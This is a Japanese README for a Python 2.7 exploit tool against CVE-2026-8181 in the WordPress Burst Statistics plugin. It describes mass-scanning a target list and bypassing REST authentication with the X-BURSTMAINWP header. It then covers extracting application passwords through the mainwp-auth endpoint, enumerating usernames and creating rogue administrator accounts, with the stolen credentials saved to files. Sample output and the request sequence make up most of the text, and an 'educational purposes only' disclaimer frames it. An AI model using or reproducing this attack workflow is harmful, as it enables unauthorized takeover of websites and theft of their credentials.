
CVE-2026-8181: Burst Statistics 認証バイパス → REST APIテイクオーバー&管理者作成。Python 2.7。教育目的のみ。
Python 2.7 で動作するエクスプロイトで、Burst Statistics プラグインの脆弱性(CVE-2026-8181)を利用し、認証されていない攻撃者が REST API 認証をバイパスして、アプリケーションパスワードを取得し、脆弱性のある WordPress サイトに新しい管理者ユーザーを作成できるようにします。
⚠️ 免責事項
このツールは教育および許可されたセキュリティテストの目的でのみ提供されます。コンピュータシステムへの不正アクセスは違法です。所有しているウェブサイト、または明示的な許可を得たウェブサイトでのみ使用してください。 その他の免責事項は Jenderal92 の表紙に記載されています。こちら !!! で確認できます。
CVE-2026-8181 は WordPress 用 Burst Statistics プラグイン(パッチ適用前のバージョン)に影響します。この脆弱性は REST API の認証メカニズムに存在し、攻撃者は以下を実行できます:
X-BURSTMAINWP ヘッダーを送信して認証をバイパスする/burst/v1/mainwp-auth エンドポイントを介してアプリケーションパスワードを取得する/、/wordpress、/wp)/wp-json/wp/v2/users または著者 ID リダイレクトによるユーザー名の列挙res_login.txt – パイプ区切りの簡潔な REST API 認証情報(解析・インポートが容易)full_res_login.txt – アクセス確認とアプリケーションパスワードを含む完全な人間可読レポートrequests ライブラリpip install requests
ターゲットリストファイルを準備します(1 行に 1 つのドメインまたは IP。http:///https:// の有無は問いません)。
targets.txt の例:
example.com
https://vulnerable-site.com
127.0.0.1/wordpress
エクスプロイトを実行します:
python2 CVE-2026-8181.py targets.txt
res_login.txt – REST API 認証情報(脆弱なターゲットごとに 1 行)full_res_login.txt – 詳細レポート| 引数 | 説明 |
|---|---|
list.txt | ターゲット URL を含むファイルへのパス |
============================================================
CVE-2026-8181 - Burst Statistics Auth Bypass Exploit
============================================================
[*] Total targets: 2
[*] Threads: 10
[*] Base paths: ['', '/wordpress', '/wp']
[*] Scanning: example.com
Trying path: /
Detected username: admin
[+] VULNERABLE! REST API bypass successful
[+] Application Password obtained!
[+] Username: admin
[+] App Password: xxxx xxxx xxxx
[+] Base64 Token: YWRtaW46eHh4eA==
[+] Access confirmed: WordPress settings
[+] Access confirmed: Installed plugins
[+] Access confirmed: Admin users
[+] Admin user created via REST API: wp_abc123
[+] Results saved to res_login.txt and full_res_login.txt
res_login.txt – 簡潔な REST API 認証情報各行は次のパイプ区切り形式に従います:
target|username|password|email|user_id
例:
http://example.com|wp_xyz789|AbC123xyz456|[email protected]|42
この形式は以下に最適です:
cut、grep、Excel による簡単な確認full_res_login.txt – 完全な詳細レポート脆弱なターゲットごとに、スクリプトは人間可読なブロックを追加します:
============================================================
Target: http://example.com
============================================================
[+] Access Verification:
[+] WordPress settings
[+] Installed plugins
[+] Admin users
[+] REST API Credentials:
Username: wp_abc123
Password: random12char
Email: [email protected]
User ID: 42
URL: http://example.com/wp-admin/
Note: Use with X-BURSTMAINWP header
[+] Application Password:
Username: admin
App Password: xxxx xxxx xxxx
Base64 Token: YWRtaW46eHh4eA==
注記: アプリケーションパスワードエンドポイントが利用できない場合、またはトークンを返さない場合は、そのセクションに
FAILEDと表示されます。
http:// プレフィックスが無い場合は追加し、末尾のスラッシュを除去します。/、/wordpress、/wp を WordPress のベースディレクトリとして試行します。/wp-json/wp/v2/users を取得するか、?author=N リダイレクトを使用します。X-BURSTMAINWP: 1 と Basic 認証(ユーザー名とダミーパスワード CVE-2026-8181)を送信します。エンドポイント /wp-json/wp/v2/users/me?context=edit が 200 を返した場合、そのサイトは脆弱です。/wp-json/burst/v1/mainwp-auth をリクエストしてアプリケーションパスワードトークンを取得します。/settings、/plugins、/users へのアクセスを確認します。スクリプト内の以下の変数を変更できます:
THREADS – 同時実行スレッド数(デフォルト 10)BASE_PATHS – チェックする追加の WordPress サブディレクトリrequests のタイムアウト値このプロジェクトは教育目的のみで提供されます。自己責任で使用してください。
POST /wp-json/wp/v2/users 経由で新しい管理者アカウントを作成します。res_login.txt に、詳細を full_res_login.txt に書き込みます。